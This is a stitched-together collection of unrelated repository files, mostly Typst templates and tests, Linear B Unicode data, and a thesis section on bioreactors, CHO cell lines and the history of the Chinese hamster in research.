[本人声明所呈交的毕业(设计)论文是我个人在导师指导下进行的研究工作及取得的研究成果。尽我所知,除了文中特别加以标注和致谢的地方外,论文中不包含其他人已经发表或撰写过的研究成果,也不包含为获得东南大学或其它教育机构的学位或证书而使用过的材料。与我一同工作的同志对本研究所做的任何贡献均已在论文中作了明确的说明并表示了谢意。]
par()[#v(1em)]
[#h(2em)论文作者签名:#box(width: 8em, stroke: (bottom: 0.5pt), outset: 2pt)#h(1.5em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日]
v(3.5cm)
set align(center)
v(1.3cm)
text(font: 字体.黑体, size: 18pt)[东南大学毕业(设计)论文使用授权声明]
v(0.5cm)
set align(left)
set par(first-line-indent: 2em, justify: true, leading: 11.83pt)
set text(font: 字体.宋体, size: 12pt)
[东南大学有权保留本人所送交毕业(设计)论文的复印件和电子文档,可以采用影印、缩印或其他复制手段保存论文。本人电子文档的内容和纸质论文的内容相一致。除在保密期内的保密论文外,允许论文被查阅和借阅,可以公布(包括刊登)论文的全部或部分内容。论文的公布(包括刊登)授权东南大学教务处办理。]
par()[#v(1em)]
[论文作者签名:#box(width: 9.5em, stroke: (bottom: 0.5pt), outset: 2pt)#h(2em)导师签名:#box(width: 11.5em, stroke: (bottom: 0.5pt), outset: 2pt)#h(1.5em)\
#h(2em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日#h(4em)日期:#box(year,width: 3.5em, stroke: (bottom: 0.5pt), outset: 2pt)年#box(month,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)月#box(day,width: 2.5em, stroke: (bottom: 0.5pt), outset: 2pt)日]
}
// 中文摘要页
#let zh_abstract_page(abstract, key_words) = {
pagebreak()
set page(
paper: "a4",
margin: (top: 3cm, x: 2.5cm, bottom: 3.8cm),
)
set text(size: 12pt, font: 字体.宋体, lang: "zh", region: "cn")
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
par()[#text(size: 0.5em)[#h(0.0em)]]
v(0.2em)
}
show: show-cn-fakebold
set heading(numbering: none)
[= 摘#h(2em)要]
set text(size: 12pt)
set par(first-line-indent: 2em, justify: true, leading: 行距)
show par: set block(spacing: 行距)
abstract
v(1em)
set par(first-line-indent: 0em)
"关键词:" + key_words.join(",")
}
// 英文摘要页
#let en_abstract_page(abstract, key_words) = {
pagebreak()
set page(
paper: "a4",
margin: (top: 2.55cm, x: 2.5cm, bottom: 3.8cm),
)
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
par()[#text(size: 0.5em)[#h(0.0em)]]
v(0.2em)
}
show: show-cn-fakebold
set heading(numbering: none)
[= ABSTRACT]
set text(size: 字号.小四, font: 字体.宋体)
set par(first-line-indent: 2em, justify: true, leading: 行距)
show par: set block(spacing: 行距)
abstract
v(2em)
"KEY WORDS: " + key_words.join(", ")
}
// 目录页
#let outline_page() = {
pagebreak()
set page(
paper: "a4",
margin: (top: 2.6cm, x: 2.5cm, bottom: 3.8cm),
)
set text(size: 12pt, font: 字体.宋体, lang: "zh", region: "cn")
set par(leading: 12pt, justify: true)
show heading.where(level: 1): it => {
set align(center)
set text(size: 16pt, font: 字体.黑体, weight: "bold")
it
}
show: show-cn-fakebold
show outline.entry: it => {
link(it.element.location())[
#set text(size: 字号.小四)
#it.body
#box(width: 1fr, repeat[.])
#it.page.at("child")
]
}
heading(level: 1, bookmarked: true, outlined: true)[目#h(2em)录]
v(0.6em)
outline(
title: none,
indent: 2em,
depth: 3,
)
set par(first-line-indent: 2em)
}
// 参考文献页
#let seu_bibliography(bib_file: "reference.bib") = {
set text(size: 字号.五号, font: 字体.宋体, lang: "en")
set par(justify: true)
bibliography(bib_file, style: "gb-t-7714-2015-numeric-seu-bachelor.csl", title: [参考文献])
}
#let appendix(doc) = {
counter(heading).update(0)
part_state.update("appendix")
set heading(numbering: (..nums) => {
let nums_array = nums.pos()
if nums_array.len() == 1 {
"附录" + numbering("A", nums_array.first()) + " "
} else {
numbering("A.1", ..nums)
}
})
doc
}
// 致谢页
#let acknowledgment(doc) = {
set heading(numbering: none)
[= 致#h(2em)谢]
doc
}
// 论文翻译模板
#let translation_conf(
raw_paper_name: none,
translated_paper_name: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
date: datetime.today().display("[year].[month].[day]"),
abstract: none,
key_words: (),
doc,
) = {
translation_cover(
raw_paper_name: raw_paper_name,
translated_paper_name: translated_paper_name,
student_id: student_id,
name: name,
college: college,
major: major,
supervisor: supervisor,
date: date,
)
// numbering setting must be before update()
set page(numbering: (..idx) => {
text(size: 9pt, numbering("I", idx.pos().first()))
})
counter(page).update(1)
zh_abstract_page(abstract, key_words)
outline_page()
set_doc(doc)
}
// 本科毕设模板
#let bachelor_conf(
title: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
duration: none,
sign_date:(none,none,none),
zh_abstract: none,
zh_key_words: (),
en_abstract: none,
en_key_words: (),
continuous_index: false,
doc,
) = {
bachelor_cover(
title: title,
student_id: student_id,
name: name,
college: college,
major: major,
supervisor: supervisor,
duration: duration,
)
claim_page(year:sign_date.at(0),month:sign_date.at(1),day:sign_date.at(2))
// numbering setting must be before update()。正文前用罗马数字编号。
set page(numbering: (..idx) => {
text(size: 9pt, numbering("I", idx.pos().first()))
})
counter(page).update(1)
zh_abstract_page(zh_abstract, zh_key_words)
en_abstract_page(en_abstract, en_key_words)
outline_page()
set_doc(doc, continuous_index: continuous_index)
}
|
|
https://github.com/antonWetzel/Masterarbeit | https://raw.githubusercontent.com/antonWetzel/Masterarbeit/main/verteidigung/theme.typ | typst | #import "@preview/polylux:0.3.1": *
#let footer_state = state("footer")
#let color-light = rgb("a5a5a5")
#let color-important = rgb("ff7900")
#let color-important-2 = rgb("003359")
#let color-contrast = rgb("007479")
#let distibution = (6fr, 14fr, 3fr)
#let distibution_no_title = (20fr, 3fr)
#let setup(footer: none, doc) = {
set page(width: 25.40cm, height: 14.29cm, margin: 0pt)
set text(lang: "de", font: "Noto Sans", region: "DE", size: 18pt, weight: 400, fallback: false)
show math.equation: set text(font: "Noto Sans Math", weight: 600, fallback: false)
set list(indent: 0.25cm)
show raw: set text(size: 1.2em)
footer_state.update(footer)
doc
}
#let slide-title(title) = locate(loc => {
stack(
dir: ttb,
text(size: 32pt, fill: color-important, strong(utils.current-section)),
v(1em),
text(size: 24pt, fill: color-important-2, strong(title)),
)
})
#let slide-footer() = locate(loc => {
set text(fill: gray, size: 10pt)
let columns = (1cm, auto, 1cm, auto, 1fr, 6cm, 1cm)
grid(
rows: (auto, 1fr),
columns: columns,
align: horizon,
gutter: 0pt,
grid.cell(colspan: columns.len(), {
let ratio = (logic.logical-slide.at(loc).first() - 0.5) / logic.logical-slide.at(locate( <final-slide-marker>)).first() * 100%
if ratio >= 100% {
line(length: 100%, stroke: 3pt + color-contrast)
} else {
set align(horizon)
stack(
dir: ltr,
line(length: ratio - 0.075cm, stroke: 3pt + color-contrast),
circle(radius: 0.15cm, stroke: color-contrast),
line(length: 100% - ratio - 0.075cm, stroke: 1pt + color-contrast),
)
}
}),
[],
logic.logical-slide.display(),
[],
footer_state.at(loc),
[],
image("assets/logo.png"),
[],
)
})
#let title-slide(title: none, subtitle: none) = {
logic.polylux-slide(grid(
rows: distibution,
pad(left: 1cm, top: 1cm, bottom: 1cm, {
text(size: 32pt, fill: color-important, strong(title))
linebreak()
text(size: 24pt, fill: color-important-2, strong(subtitle))
}),
image("assets/first.jpg"),
slide-footer(),
))
}
#let normal-slide(
title: none,
columns: auto,
expand-content: false,
outline-content: none,
..content,
) = {
let positional = content.pos()
let columns = if columns == auto {
(1fr,) * positional.len()
} else if columns.len() == positional.len() {
columns
} else {
panic("missmatch co.umns and arguments")
}
let body = table(
columns: columns,
stroke: none,
..content
)
let title = slide-title(title)
let title = if expand-content {
title
} else {
grid.cell(colspan: columns.len(), title)
}
let positional = if expand-content {
let positional = positional.enumerate().map((arg) => if arg.at(0) == 0 {
arg.at(1)
} else {
grid.cell(rowspan: 2, arg.at(1))
})
positional.push(positional.remove(0))
positional
} else {
positional
}
let top = pad(1cm, bottom: 0.5cm, grid(
rows: distibution.slice(0, 2),
column-gutter: 0.5cm,
stroke: outline-content,
columns: columns,
title,
..positional,
))
logic.polylux-slide({
grid(
rows: (distibution.at(0) + distibution.at(1), distibution.at(2)),
top,
slide-footer(),
)
})
}
#let new-section(section) = {
utils.register-section(section)
}
#let final-slide(
title: none,
e-mail: none,
website: none,
) = {
let suffix = if website == none { none } else { [ | ] + website }
logic.polylux-slide(grid(
rows: distibution,
pad(1cm, bottom: 0cm, stack(
dir: ttb,
text(size: 32pt, fill: color-important, strong(title)),
v(0.5cm),
text(size: 14pt, fill: color-important-2, e-mail + suffix),
v(0.3cm),
text(
size: 6pt,
fill: gray,
[Bildnachweis: Folie 1: <NAME>, Folie #logic.logical-slide.display(): helibild],
),
)),
[#image("assets/final.jpg") <final-slide-marker>],
slide-footer(),
))
}
#let focus-slide(size: 100pt, content) = {
utils.register-section(content)
set align(center + horizon)
logic.polylux-slide({
grid(
rows: distibution_no_title,
text(size: size, fill: color-contrast, strong(content)),
slide-footer(),
)
})
}
#let number = (number, unit: none) => {
let number = str(float(number))
let split = number.split(".")
let res = []
{
let text = split.at(0)
for i in range(text.len()) {
res += text.at(i)
let idx = text.len() - i - 1
if idx != 0 and calc.rem(idx, 3) == 0 {
res += sym.space.thin
}
}
}
if split.len() >= 2 {
res += $,$
let text = split.at(1)
for i in range(text.len()) {
res += text.at(i)
if i != 0 and calc.rem(i, 3) == 0 {
res += sym.space.thin
}
}
}
if unit != none {
res += [ ] + unit
}
return box(res)
}
|
|
https://github.com/loqusion/typix | https://raw.githubusercontent.com/loqusion/typix/main/docs/api/derivations/common/src.md | markdown | MIT License | <!-- markdownlint-disable-file first-line-h1 -->
[Source](../../recipes/specifying-sources.md) containing all local files
needed in your Typst project.
|
https://github.com/jamesrswift/pixel-pipeline | https://raw.githubusercontent.com/jamesrswift/pixel-pipeline/main/src/pipeline/canvas/process.typ | typst | The Unlicense | #import "/src/math/lib.typ": *
#let individual(element, anchors: (:)) = {
let bounds = none
let element = element // mutable
if "drawables" in element {
if type(element.drawables) == dictionary {
element.drawables = (element.drawables,)
}
for drawable in element.drawables {
bounds = aabb.from-vectors(
if drawable.type == "path" {
path-util.bounds(drawable.segments)
} else if drawable.type == "content" {
let (x, y, _, w, h,) = drawable.pos + (drawable.width, drawable.height)
((x + w / 2, y - h / 2, 0), (x - w / 2, y + h / 2, 0))
},
initial: bounds
)
}
}
return (
bounds: bounds,
drawables: element.at("drawables", default: ()),
)
}
#let many(body, anchors: (:)) = {
let drawables = ()
let anchors = anchors // mutable
let bounds = none
for element in body {
if type(element) == array {
(bounds, drawables, anchors) = many(element, anchors)
} else {
let processed = individual(element)
if processed != none {
if processed.bounds != none {
bounds = aabb.from-vectors(processed.bounds, initial: bounds)
}
drawables += processed.drawables
}
}
}
return (
bounds: bounds,
drawables: drawables,
anchors: anchors
)
} |
https://github.com/darioglasl/Arbeiten-Vorlage-Typst | https://raw.githubusercontent.com/darioglasl/Arbeiten-Vorlage-Typst/main/01_Einleitung/04_technologies.typ | typst | == Verwendete Technologien <headingUsedTechnologies>
|
|
https://github.com/Tiggax/zakljucna_naloga | https://raw.githubusercontent.com/Tiggax/zakljucna_naloga/main/src/sec/uvod/2.%20bioreactors.typ | typst | #set heading(offset: 1)
#import "../../additional.typ": todo
#import "/src/figures/mod.typ": reactor, batch_reactor
A bioreactor is typically described as an apparatus containing a chamber in which organisms such as bacteria or yeast are grown.
The purpose of it is the production of biomolecular metabolites or biopolymers or conversion of organic wastes @mandenius_2016[p. 8].
Even if the first impression the bioreactor gives is something mundane, they represent vital components in biotechnological processes, particularly in modern pharmaceutical production.
They are instruments or systems engineered to provide an optimal environment wherein biological reactions can catalyze, facilitating the growth of cells, tissues, or microbial cultures.
They are used in production of food, chemicals and drugs.
Bioreactor have been in use since ancient times.
Old antique cultures solved bioengineering design challenges for practical purposes such as wine and beer making from mere experience and observations.
This paved the way for the advancements of biotechnological processes, mainly for preparation, production and preservation of food products @soetaert_2010.
By the early twentieth century, large-scale fermentation processes were being utilized, with impact onto the war-time industry of that period.
Glycerol was being produced for its use in manufacture of explosives,
achieved by using yeast for conversion from glucose @mandenius_2016[p. 2].
Butanol and acetone experienced large-scale production utilizing the butyric acid bacteria developed by biochemist <NAME>.
These were first used for production of explosives, and later rubber manufacture needs of the emerging car industry @santangelo_1996.
The basic parameters for biotechnological processes, like temperature, pH value, dissolved oxygen, etc., are measured and controlled by standard devices implemented in every commercial stirred tank @Kretzmer_2002[p. 138]. These provide information about the values in the bioreactor at each taken measurement.
In a bioreactor these measurements are divided into three groups:
- _physical_ such as temperature, pressure, flow, etc.
- _chemical_ such as pH or concentrations of $O_2$ or $C O_2$
- _biological_ such as biomass, enzyme activity, consumption of substrate and so on.
All of these measurements can be divided into one of two groups based on how the measurement is taken.
_Online_ measurements are measured on the bioreactor, and can be monitored in real time, while _offline_ measurements need to be measured by taking a sample of a bioreactor process.
== Types
Bioreactors can be classified into many different types.
They differ in their operation, process time, use and functionality.
Among them suspension bioreactors are the most used by far.
They are easier to operate and can scale much larger.
Their importance can be demonstrated by the annual sales volume of over 250 billion dollars @Meyer_Schmidhalter_2014.
Bioreactors are grouped into three groups by their scale.
The smallest among the three are the _laboratory_ bioreactors.
These range up to 5 L, and are mainly used for revitalization an cell growth.
_Pilot_ bioreactors range up to 200 L in size, and can be meant either for inoculum growth or as semi-industrial meant for process optimization or reactor testing.
Lastly the largest bioreactors are _industrial_, with their size ranging up to 100 000 L.
As the name suggests, they are meant for industrial production.
During the biotechnological process, stirring of the bioreactor is of vital importance.
Stirring ensures that nutrients, cells, substrate and other substances are uniformly distributed throughout the bioreactor.
This can be achieved by using a mechanical mixer, aeration of the bioreactor, using a circulation pump or a combination of these.
For mechanical stirring various types of impellers are available @Kretzmer_2002[p. 138].
Aeration of the bioreactor is also important for maintaining the oxygen level needed for many aerobic organisms to survive, eucaryotic cells being one of them.
This process also helps with stripping of waste gasses such as $C O_2$ that can saturate in the medium, and potentially kill the organisms.
On the basis of mode of operation, a bioreactor may be classified as batch, fed batch or continuous (e.g. a continuous stirred-tank reactor model).
=== Batch
The most basic and oldest of the bioreactor types is the batch bioreactor.
Batch bioreactors derive their name from the way the product is made in batches.
Bioreactor is prepared with a substrate, and then the process starts with inoculation of the organism.
The process is then monitored until the desired product concentration is achieved.
It is then harvested and process can be restarted with a new batch.
A simple sketch of a batch bioreactor can be seen in @batch.
#figure(
caption: [A simple model of a bioreactor],
reactor
)<batch>
The most typical example of batch bioreactor process is beer brewing, one of the oldest biotechnological processes.
In biopharmaceuticals these bioreactors can be used for production of small scale antibodies for research and diagnostic application, but @Kretzmer_2002[p. 138].
The problem with batch bioreactors is their nutrients deplete during the run, which not only results in a drop of viability and death of cells, but also contributes to a steady increase of toxic metabolites.
Ultimately batch reactors result in toxication of the process, since toxic metabolites are not removed @Kretzmer_2002[p. 139].
=== Fed-batch
Fed-batch bioreactors differ in that they are "fed" during the process.
The reactor receives a steady supply of substrate during the duration of the process as can be seen in @fed-batch.
This can prevent the culture from crashing from the lack of nutrients, and helps to encourage the production of primary metabolites.
This can be seen in a extension of the stationary faze of cell growth and helps delay the dying phase of cells.
By maintaining low concentration set points of major carbon substrates, a more efficient primary metabolism production can be achieved, with lower rates of metabolic by-products. This results in the cells remaining in a productive state over an extended time, which has enabled considerable enhancement of yields from these processes @Butler_2005[p. 285].
#figure(
caption: [A simple model of a bioreactor],
batch_reactor
)<fed-batch>
== Bioreactors using CHO Cells
The first recorded growth of eucaryotic cells happened in 1907.
This was achieved by <NAME> by managing to grow nerve cells utilizing the hanging drop method.
The cells were grown over a period of 30 days which showed the possibility of growing cells in vitro.
This is why many regard year 1907 as the beginning of cell cultivation
@Kretzmer_2002[p. 135].
The biggest leap forward towards large scale cultivation of animal cells was achieved by Earle and Eagle.
They made extensive analysis of the requirements of cells grown in vitro.
By 1955, chemically defined medium known as @EMEM; short for Eagle's minimum essential medium, was reported by Eagle.
This medium could replace the biological fluids such as bovine serum that were used till then.
The only necessity that remained was the needed addition of undefined blood serum @Kretzmer_2002[p. 135].
Bovine serum was used as a supplement of cell culture media for several decades.
It contains many substances needed for cell growth, such as hormones, growth factors and trace elements.
It also contains high amounts of albumin, that ensures cell protection from changes like pH fluctuations of shear forces.
Variable and undefined composition of the bovine serum made it hard to keep stable and consistent growth and productivity of cells.
This combined with the mad cow crisis in the beef industry, created a strong demand for cell culture mediums free of all animal components
@Butler_2005[p. 286].
Revolution started by recombinant @DNA technology and genetic engineering stirred the field of industrial biotechnology with macromolecular products acquired from cells.
At first bacteria and yeast were being used as producers, but soon animal and human cells followed @butler_2012.
By the early 1980s, recombinant proteins started to be introduced to the pharmaceutical industry@Kretzmer_2002[p. 136].
@CHO cell lines are among the most extensively utilized hosts for the production of therapeutic proteins in the bio-pharmaceutic industry @Wurm_2004.
Nearly 80% of the approved human therapeutic antibodies are produced by @CHO cells @Xu_Lin_Mi_Pang_Wang_2023.
They provide an advantage over other non-eucaryotic cell lines, since they are able to achieve correct glycosylation patterns of mammalian-cells, needed for protein therapeutics such as therapeutic antibodies @Cui_2023[p. 1].
Their use in stirred tank bioreactors are preferred because of their scalability with these cells @Kretzmer_2002[p. 138].
Currently, stirred tank bioreactors over 10,000 L scale are readily used for SF suspension cultures of recombinant CHO (@rCHO) cells producing therapeutic antibody @Kim_2012[p. 917-918].
=== Chinese hamster (_Cricetulus griseus_)
Chinese hamster or Chinese striped hamsters are rodents of the _Cricetidae_ family.
They are native to deserts of China and Mongolia.
Typically they're brown with a black stripe running down their back.
Their belly is of lighter color.
The tail is longer than the typical hamster species.
Coloration in combination with their physique makes them look more mouse-like.
Genus _Cricetulus_ contains species that tend to be more ratlike in appearance than the typical hamster.
They reach maturity at two months, and their gestation period is only three weeks @lsf_2015[p. 39].
Their lifespan is two to three years.
The size ranges from 76 mm to 127 mm, with the tail being 20 mm to 33 mm.
They weigh between 30 and 45 grams.
They are closely related with the Chinese striped hamster (_Cricetulus barabensis_) and are taxonomically unsettled. Some authorities consider them as a separate species, while some classify them as subspecies.
In that case the Latin name of the Chinese hamster becomes _Cricetulus barabensis griseus_, and the Chinese striped hamster becomes _Cricetulus barabensis barabensis_.
=== History of the Chinese hamster in research
Chinese hamsters were first successfully used as laboratory specimens in the early 20th century in place of mice.
First such report was posted by Hsieh in 1919 report: "A new laboratory animal (Cricetulus griseus)".
He encountered them in the streets of Peking, where were the captured hamsters were being sold as pets.
As mice were scarce at the time he opted to use them in his study for identification of pneumococcal types by Avery's method @Yerganian_1972[p. 8].
Their fast maturity and low gestation period made them a promising animal model to study several generations over a single year @lsf_2015[p. 39].
By the mid 20th century, the captured Chinese hamsters were used routinely, both locally and in other countries.
Peking Union Medical College maintained an inexhaustible amount of captured animals.
The figures of annually employed hamsters were in the thousands.
Chinese hamsters were being used in variety of studies pertaining to Leishmaniasis, tuberculosis, diphtheria, rabies, equine encephalitis, influenza, pneumonia, Monilia, relapsing fever and other drug evaluations.
Strong consideration as a possible strong reservoir host for _Leishmania donovani_ garnered world-wide attention of the Chinese hamster.
This parasite is the etiological agent for kala-azar a disease also know as black fever, and is prevalent in tropical and temperate regions like China, Middle East, South America and the Mediterranean basin @van_2012[p.310].
The rising popularity of the Chinese hamster led to attempts to breed them in captivity, but they all failed due to their pugnacious habits exhibited whenever adult animals were paired.
Since the Chinese hamster proved to be a most sensitive host for the various forms of _Leishmaniae_, researchers in other countries, notably India and the Near East, were encouraged to import them from China for their own needs @Yerganian_1972[p. 9].
In China researchers Chang and Wu also noted irregularities in the estrous cycle of captured females, and were able to obtain 5 small litters from laboratory-born females over a 2-year period of trials @Chang1938.
After a report describing the karyotype as consisting of 7 pairs of chromosomes in hamsters was posted, the interest in the Chinese hamster was renewed @Pontecorvo_1944.
Low chromosome count in comparison to other animals (mice have 2n = 40 and rats have 2n = 42) made them promising animals for cytogenetic research @Jayapal_2007[p. 41].
In 1948 20 subjects; ten female and ten male were smuggled out of China into the U.S. by Dr. <NAME>.
The hamsters were supplied by Dr. <NAME>, a pathologist at Peking Union Medical College for Dr. Schwentker to try to start a colony @Yerganian_1972[p. 12-13].
The hamsters left China on one of the last Pan-Am flights out of Shanghai before the Chinese civil war ended with the Maoists victory and an establishment of the new Peoples Republic.
Dr. Hu and Dr. Watson were both charged by the Chinese Germ Warfare Commission.
Dr. Watson was accused of "war crimes" and tried in absent while Dr. Hu was
found guilty of supplying scientific material to the enemy.
He was convicted and sent to a detention camp for six months
@Yerganian_1972[p. 15].
Upon successful landing of the hamsters in San Francisco, they were shipped to Schwentker's farm.
Schwentker managed to domesticate and breed them in captivity. The process required a great amount of labor intensive taming, but within two years he had managed to create a thriving colony.
By 1954 Schwentker discontinued sales of Chinese hamsters.
They were popular with researchers, but the natural solidarity combined with female aggression in captivity made raising and breeding them a difficult and laborious job.
Schwentker never published or shared his breeding techniques, but by 1954, <NAME>; a graduate student at Harvard had devised his own hamster-taming methods.
With funds from the National Cancer Institute, he established a breeding center and began distributing hamsters to scientific colleagues.
He became the sole supplier of Chinese hamsters to biomedical research institutions for the next decade in the United States @lsf_2015.
=== CHO cell lines
The developments of the 1970s – fusion of cells to form hybridomas, and genetic engineering – triggered a second wave of products. Monoclonal antibodies and recombinant proteins for diagnosis and therapy set new challenges for the inventors @Kretzmer_2002[p. 135].
Looking at today, there has been a rapid increase in the number and demand for approved bio-pharmaceuticals produced from animal cell culture processes.
Some part of it has been due to the efficiency of several humanized monoclonal antibodies that are required at large dose for therapeutic use @Butler_2005[p. 283].
Popularity of @CHO cells can be attributed to these reasons.
Firstly, as @CHO cells have been demonstrated as safe hosts, it is easier to obtain approval to market the therapeutic proteins from regulatory agencies like the @FDA.
Secondly, low specific productivity, normally the disadvantage of using mammalian cells for protein production, can be overcome by @CHO cells gene amplification.
Powerful gene amplifications systems, like dihydrofolate reductase (DHFR)-mediated or glutamine synthase (GS) - mediated gene amplification are available for @CHO cells.
Thirdly, @CHO cells have the capacity for efficient post-translational modification, and also produce recombinant proteins with glyo forms that are both compatible with and fully functional within humans.
Finally, @CHO cells can adapt easily to growth in the regulatory-friendly serum-free suspension conditions.
This characteristic is preferred for large-scale culture in bioreactors @Kim_2012[p. 917-918].
Recent advances in cell culture technology for @rCHO cells have achieved significant improvement in protein production leading to titer of more than 10 g/L to meet the huge demand from market needs @Kim_2012[p. 917].
As such @CHO cells have become the standard mammalian host cells used in the production of recombinant proteins, although there are other options such as the mouse myeloma (NS0), baby hamster kidney (@BHK), human embryonic kidney (@HEK[293]) or human-retina-derived (PER C6) cells.
All these cell lines have been adapted to grow in suspension culture and are well suited for scale-up in stirred tank bioreactors @Butler_2005[p. 284].
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/layout/enum-numbering_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test numbering pattern.
#set enum(numbering: "(1.a.*)")
+ First
+ Second
2. Nested
+ Deep
+ Normal
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/unichar/0.1.0/ucd/block-10000.typ | typst | Apache License 2.0 | #let data = (
("LINEAR B SYLLABLE B008 A", "Lo", 0),
("LINEAR B SYLLABLE B038 E", "Lo", 0),
("LINEAR B SYLLABLE B028 I", "Lo", 0),
("LINEAR B SYLLABLE B061 O", "Lo", 0),
("LINEAR B SYLLABLE B010 U", "Lo", 0),
("LINEAR B SYLLABLE B001 DA", "Lo", 0),
("LINEAR B SYLLABLE B045 DE", "Lo", 0),
("LINEAR B SYLLABLE B007 DI", "Lo", 0),
("LINEAR B SYLLABLE B014 DO", "Lo", 0),
("LINEAR B SYLLABLE B051 DU", "Lo", 0),
("LINEAR B SYLLABLE B057 JA", "Lo", 0),
("LINEAR B SYLLABLE B046 JE", "Lo", 0),
(),
("LINEAR B SYLLABLE B036 JO", "Lo", 0),
("LINEAR B SYLLABLE B065 JU", "Lo", 0),
("LINEAR B SYLLABLE B077 KA", "Lo", 0),
("LINEAR B SYLLABLE B044 KE", "Lo", 0),
("LINEAR B SYLLABLE B067 KI", "Lo", 0),
("LINEAR B SYLLABLE B070 KO", "Lo", 0),
("LINEAR B SYLLABLE B081 KU", "Lo", 0),
("LINEAR B SYLLABLE B080 MA", "Lo", 0),
("LINEAR B SYLLABLE B013 ME", "Lo", 0),
("LINEAR B SYLLABLE B073 MI", "Lo", 0),
("LINEAR B SYLLABLE B015 MO", "Lo", 0),
("LINEAR B SYLLABLE B023 MU", "Lo", 0),
("LINEAR B SYLLABLE B006 NA", "Lo", 0),
("LINEAR B SYLLABLE B024 NE", "Lo", 0),
("LINEAR B SYLLABLE B030 NI", "Lo", 0),
("LINEAR B SYLLABLE B052 NO", "Lo", 0),
("LINEAR B SYLLABLE B055 NU", "Lo", 0),
("LINEAR B SYLLABLE B003 PA", "Lo", 0),
("LINEAR B SYLLABLE B072 PE", "Lo", 0),
("LINEAR B SYLLABLE B039 PI", "Lo", 0),
("LINEAR B SYLLABLE B011 PO", "Lo", 0),
("LINEAR B SYLLABLE B050 PU", "Lo", 0),
("LINEAR B SYLLABLE B016 QA", "Lo", 0),
("LINEAR B SYLLABLE B078 QE", "Lo", 0),
("LINEAR B SYLLABLE B021 QI", "Lo", 0),
("LINEAR B SYLLABLE B032 QO", "Lo", 0),
(),
("LINEAR B SYLLABLE B060 RA", "Lo", 0),
("LINEAR B SYLLABLE B027 RE", "Lo", 0),
("LINEAR B SYLLABLE B053 RI", "Lo", 0),
("LINEAR B SYLLABLE B002 RO", "Lo", 0),
("LINEAR B SYLLABLE B026 RU", "Lo", 0),
("LINEAR B SYLLABLE B031 SA", "Lo", 0),
("LINEAR B SYLLABLE B009 SE", "Lo", 0),
("LINEAR B SYLLABLE B041 SI", "Lo", 0),
("LINEAR B SYLLABLE B012 SO", "Lo", 0),
("LINEAR B SYLLABLE B058 SU", "Lo", 0),
("LINEAR B SYLLABLE B059 TA", "Lo", 0),
("LINEAR B SYLLABLE B004 TE", "Lo", 0),
("LINEAR B SYLLABLE B037 TI", "Lo", 0),
("LINEAR B SYLLABLE B005 TO", "Lo", 0),
("LINEAR B SYLLABLE B069 TU", "Lo", 0),
("LINEAR B SYLLABLE B054 WA", "Lo", 0),
("LINEAR B SYLLABLE B075 WE", "Lo", 0),
("LINEAR B SYLLABLE B040 WI", "Lo", 0),
("LINEAR B SYLLABLE B042 WO", "Lo", 0),
(),
("LINEAR B SYLLABLE B017 ZA", "Lo", 0),
("LINEAR B SYLLABLE B074 ZE", "Lo", 0),
(),
("LINEAR B SYLLABLE B020 ZO", "Lo", 0),
("LINEAR B SYLLABLE B025 A2", "Lo", 0),
("LINEAR B SYLLABLE B043 A3", "Lo", 0),
("LINEAR B SYLLABLE B085 AU", "Lo", 0),
("LINEAR B SYLLABLE B071 DWE", "Lo", 0),
("LINEAR B SYLLABLE B090 DWO", "Lo", 0),
("LINEAR B SYLLABLE B048 NWA", "Lo", 0),
("LINEAR B SYLLABLE B029 PU2", "Lo", 0),
("LINEAR B SYLLABLE B062 PTE", "Lo", 0),
("LINEAR B SYLLABLE B076 RA2", "Lo", 0),
("LINEAR B SYLLABLE B033 RA3", "Lo", 0),
("LINEAR B SYLLABLE B068 RO2", "Lo", 0),
("LINEAR B SYLLABLE B066 TA2", "Lo", 0),
("LINEAR B SYLLABLE B087 TWE", "Lo", 0),
("LINEAR B SYLLABLE B091 TWO", "Lo", 0),
(),
(),
("LINEAR B SYMBOL B018", "Lo", 0),
("LINEAR B SYMBOL B019", "Lo", 0),
("LINEAR B SYMBOL B022", "Lo", 0),
("LINEAR B SYMBOL B034", "Lo", 0),
("LINEAR B SYMBOL B047", "Lo", 0),
("LINEAR B SYMBOL B049", "Lo", 0),
("LINEAR B SYMBOL B056", "Lo", 0),
("LINEAR B SYMBOL B063", "Lo", 0),
("LINEAR B SYMBOL B064", "Lo", 0),
("LINEAR B SYMBOL B079", "Lo", 0),
("LINEAR B SYMBOL B082", "Lo", 0),
("LINEAR B SYMBOL B083", "Lo", 0),
("LINEAR B SYMBOL B086", "Lo", 0),
("LINEAR B SYMBOL B089", "Lo", 0),
)
|
https://github.com/Pablo-Gonzalez-Calderon/apuntes-botanica | https://raw.githubusercontent.com/Pablo-Gonzalez-Calderon/apuntes-botanica/main/src/template.typ | typst | Other | #import "@preview/showybox:2.0.1": showybox
#let properties(body) = {
set heading(numbering: "1.")
set text(lang: "es", font: "Linux Libertine")
set par(justify: true)
show heading.where(level: 4, numbering: "1."): it => {
heading(level: 4, numbering: none, it.body.text)
}
set page(numbering: ("1"))
set enum(indent: 1.25em)
set list(indent: 1.25em)
body
}
#let title() = {
set document(title: "Apuntes de Botánica", author: "<NAME>")
set page(paper: "a7")
align(center)[
#block(spacing: 0pt, text(size: 2em, weight: 700, "Apuntes de Botánica"))
#block(spacing: 10pt, text(size: 1.5em, weight: 500, [AGL101 --- Sección 1 ]))
#text(size: 1.25em, "Semestre 2023-2")
#text(size: 1em, "<NAME>")
]
}
#let new-class(new-page: true, tema, date) = {
if new-page {
pagebreak()
}
counter(heading).update(0)
block(
